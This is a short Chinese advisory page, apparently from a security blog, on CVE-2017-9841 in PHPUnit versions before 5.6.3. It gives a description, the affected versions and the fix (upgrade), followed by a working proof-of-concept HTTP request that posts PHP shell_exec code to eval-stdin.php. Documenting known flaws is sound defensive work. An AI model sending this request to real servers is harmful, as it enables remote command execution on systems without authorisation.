PHPUnit代码执行

1
2
3
4
5
6
7
8
9
10
CVE-2017-9841

漏洞简介
	PHPUnit5.6.3之前的版本,存在一处远程代码执行漏洞,利用漏洞可以获取服务器敏感信息及权限

漏洞影响
	PHPUnit < 5.6.3
	
整改建议
	升级最新版
1
2
3
4
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: 

<?=shell_exec("whoami");?>

更新: 2023-04-14 23:05:55
原文: https://www.yuque.com/yuqueyonghuwrqimt/vtxvff/qnfw3m

漏洞挖掘与复现 > 开发框架
PHPUnit代码执行
https://savior-only.github.io/p/3dbd596907754b9fb4eb5dc421125d48/
作者
savior
发布于
2024年12月25日
更新于
2024年12月27日
许可协议